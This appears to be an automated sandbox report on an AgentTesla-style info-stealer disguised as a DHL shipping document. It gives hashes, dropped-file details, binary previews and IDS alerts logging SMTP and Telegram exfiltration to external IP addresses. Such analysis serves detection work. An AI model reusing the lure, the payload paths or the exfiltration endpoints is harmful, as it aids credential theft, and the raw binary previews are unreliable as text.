                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49152
                                                                                                    Entropy (8bit):0.7876734657715041
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                    MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                    SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                    SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                    SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):147456
                                                                                                    Entropy (8bit):0.7217007190866341
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                    MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                    SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                    SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                    SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):1.4755077381471955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94208
                                                                                                    Entropy (8bit):1.2882898331044472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                    MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                    SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                    SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                    SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94208
                                                                                                    Entropy (8bit):1.2882898331044472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                    MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                    SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                    SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                    SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2802176
                                                                                                    Entropy (8bit):5.761784045620971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:OJKVeYMXiBAYFt0lGAQ3sO62gUXF0ktL8H/00890EMwEBUKtu1Dze6HDpLIbYBCd:QYYmVZL8sH9jJWCT9DG8xCCK
                                                                                                    MD5:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                    SHA1:8AB34B84B1475D03BEDA51C79F841EC98E97E350
                                                                                                    SHA-256:9080FC157A688B3946BB805B004DA99EBF4415BA1D9B46E3DAC43A6F02DD11C3
                                                                                                    SHA-512:B9A2C370C16398EE96E1E0855E8351D521403BE9CC03CE7F381A66CA183317744CD30F312CFBC625199A473AC7D10B146D435EB97F825A710AFF8D33B276011F
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..................)...........*.. ....@...... ....................... +...........`...@......@............... ........................*.W.... *.4.....................+...................................................... ............... ..H............text.....).. ....)................. ..`.rsrc...4.... *.......).............@..@.reloc........+.......*.............@..B..*.....H.........).........F...h1....)..........................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..
                                                                                                    Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171520
                                                                                                    Entropy (8bit):6.183577945077043
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                                                                                    MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                    SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                                                                                    SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                                                                                    SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........
                                                                                                    Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):1.4755077381471955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):1.4755077381471955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):1.4755077381471955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.761784045620971
                                                                                                    TrID:
                                                                                                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                                                                    • Win64 Executable GUI (202006/5) 44.25%
                                                                                                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                                                                    • Win64 Executable (generic) (12005/4) 2.63%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.44%
                                                                                                    File name:DHL_Shipping_Document2.exe
                                                                                                    File size:2802176
                                                                                                    MD5:e2f0b0afe1d1cabe6d0fc082fadde43f
                                                                                                    SHA1:8ab34b84b1475d03beda51c79f841ec98e97e350
                                                                                                    SHA256:9080fc157a688b3946bb805b004da99ebf4415ba1d9b46e3dac43a6f02dd11c3
                                                                                                    SHA512:b9a2c370c16398ee96e1e0855e8351d521403be9cc03ce7f381a66ca183317744cd30f312cfbc625199a473ac7d10b146d435eb97f825a710aff8d33b276011f
                                                                                                    SSDEEP:24576:OJKVeYMXiBAYFt0lGAQ3sO62gUXF0ktL8H/00890EMwEBUKtu1Dze6HDpLIbYBCd:QYYmVZL8sH9jJWCT9DG8xCCK
                                                                                                    TLSH:BBD5ADB33187FECCD72F1D64D0182A509C101967476C9298FEC92A9F92E59A8EF9C5F0
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..................)...........*.. ....@...... ....................... +...........`...@......@............... .....
                                                                                                    Icon Hash:eaee8e96b2a8e0b2
                                                                                                    Entrypoint:0x6a020e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x64179CB4 [Sun Mar 19 23:37:24 2023 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    dec eax
                                                                                                    mov eax, dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    jmp eax
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2a01b40x57.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a20000xd834.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b00000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x29e21a0x29e400unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x2a20000xd8340xda00False0.08961080848623854data3.8147209986691957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x2b00000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_ICON0x2a21300xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m
                                                                                                    RT_GROUP_ICON0x2af3580x14data
                                                                                                    RT_VERSION0x2af36c0x314data
                                                                                                    RT_MANIFEST0x2af6800x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    192.168.2.3208.91.199.225496995872840032 03/20/23-11:34:28.478393TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249699587192.168.2.3208.91.199.225
                                                                                                    192.168.2.3208.91.198.143497045872851779 03/20/23-11:35:14.897311TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49704587192.168.2.3208.91.198.143
                                                                                                    192.168.2.3208.91.198.143497045872840032 03/20/23-11:35:14.897311TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249704587192.168.2.3208.91.198.143
                                                                                                    192.168.2.3208.91.199.225497035872840032 03/20/23-11:35:13.114104TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249703587192.168.2.3208.91.199.225
                                                                                                    192.168.2.3208.91.199.223496985872851779 03/20/23-11:34:24.041449TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.198.143497025872851779 03/20/23-11:35:12.738289TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702587192.168.2.3208.91.198.143
                                                                                                    192.168.2.3208.91.199.225496995872851779 03/20/23-11:34:28.478393TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49699587192.168.2.3208.91.199.225
                                                                                                    192.168.2.3208.91.199.225497035872030171 03/20/23-11:35:13.113999TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49703587192.168.2.3208.91.199.225
                                                                                                    192.168.2.3208.91.199.223497055872840032 03/20/23-11:35:15.831914TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249705587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.199.223496985872840032 03/20/23-11:34:24.041449TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249698587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.198.143497025872030171 03/20/23-11:35:12.738168TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49702587192.168.2.3208.91.198.143
                                                                                                    192.168.2.3208.91.199.223497055872030171 03/20/23-11:35:15.831914TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49705587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.199.223497055872851779 03/20/23-11:35:15.831914TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49705587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.199.225496995872030171 03/20/23-11:34:28.478287TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49699587192.168.2.3208.91.199.225
